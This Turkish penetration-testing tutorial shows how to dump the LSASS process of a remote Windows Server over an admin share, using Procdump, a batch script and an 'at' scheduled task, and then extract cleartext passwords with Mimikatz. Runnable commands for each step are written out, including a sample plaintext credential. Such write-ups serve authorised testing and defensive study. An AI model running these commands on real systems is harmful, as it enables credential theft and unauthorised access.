Disk Sistemine Erişim Sağlanan Bilgisayardan Alınan LSASS Prosesine Ait Dump Dosyasının Mimikatz Aracına Verilerek Parolaların Açık Halinin Elde Edilmesi

Etki alanı sızma testleri sırasında Windows işletim sistemine yetkili erişim sağlandıktan sonra, gerçekleştirilen adımlardan birisi bellek üzerinden parolaların açık halinin elde edilmesidir. Bu amaçla WCE veya Mimikatz gibi araçlar kullanılabilmektedir. Bu yazıda, uzaktan komut satırı erişimi elde edilemeyen ancak disk sistemine uzaktan erişim sağlanabilen Windows işletim sistemindeki LSASS prosesinin dump hali alınacak ve Mimikatz aracı ile parolanın açık hali elde edilecektir.

WCE ve Mimikatz araçları temel olarak RAM üzerinde bulunan kimlik doğrulama paketlerindeki (authentication packages) kimlik bilgilerini (şifreli parola ve parola özetlerini, kullanıcı adı gibi) okur, parolayı (ve MSV1_0.dll için parola özetini) şifreleyen şifreleme anahtarını elde eder. Sonrasında ise, şifreli kimlik bilgilerini çözer (deşifre eder). Bu yazıda, DCMakinesi adlı 64 bit mimarideki Windows Server 2008 R2 bilgisayarda yerel yönetici hakları ile disk sistemine erişim sağlanabildiği varsayılacaktır. Disk sistemi erişimi sağlandıktan sonra LSASS prosesinin dump dosyası ele geçirilirse, oturumu açık olan veya bir şekilde kimlik doğrulaması gerçekleştiren hesaplara (bu yazı için Administrator, Jale ve Zeynep) ait kimlik bilgileri elde edilebilir. Bu amaçla, öncelikle hedef sistemin diskine Windows Systernals aracı olan Procdump aracı indirilir. Bunun yanında bu aracı çalıştıracak olan bir betik hazırlanarak hedef sistemin diskine kaydedilir.

net use \\192.168.100.200\C$ /user:Ornek\Halit Hh123456

@echo off
C:\ProsesDizini\procdump.exe -accepteula -ma lsass.exe C:\ProsesDizini\LSASS_prosesi.dmp

obtaining-clear-text-password-from-lsass-dump-file-that-is-stolen-from-network-drive-mapping-using-mimikatz-tool-01

Bu betik kullanılarak, Procdump aracı çalıştırılacak ve LSASS prosesinin dump hali elde edilecektir. Hedef sisteme komut satırı erişimi elde edilmiş olsaydı betik çalıştırılabilirdi. Bu yazıda, komut satırı erişimi olmadığı için, “at” aracı kullanılarak hedef sistemde zamanlanmış bir görev oluşturulacak ve betik çalıştırılacaktır. Mevcut durumda saatin 19:40 olduğu görülmektedir. Aşağıdaki ekran görüntüsünde 2 dakika sonrası için bir zamanlanmış görev oluşturulduğu ve zaman geldiğinde (19:42) betiğin çalışarak LSASS_prosesi.dmp dosyasını oluşturduğu görülmektedir.

net time \\192.168.100.200
at \\192.168.100.200 19:42 C:\ProsesDizini\Betik.bat
at \\192.168.100.200
net time \\192.168.100.200
net time \\192.168.100.200
at \\192.168.100.200

obtaining-clear-text-password-from-lsass-dump-file-that-is-stolen-from-network-drive-mapping-using-mimikatz-tool-02

Dump dosyası, aynı mimariye sahip (64 bit mimarideki Windows 7 veya Windows Server 2008 R2) bir bilgisayara taşınıp Mimikatz aracına parametre olarak verilirse, LSASS prosesinde kayıtlı olan kimlik bilgileri elde edilebilmektedir.

mimikatz.exe “sekurlsa::minidump LSASS_prosesi.dmp” “sekurlsa::wdigest” exit

obtaining-clear-text-password-from-lsass-dump-file-that-is-stolen-from-network-drive-mapping-using-mimikatz-tool-03

Komut çıktısının devamında kimlik bilgilerinin olduğu görülmektedir.

obtaining-clear-text-password-from-lsass-dump-file-that-is-stolen-from-network-drive-mapping-using-mimikatz-tool-04

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.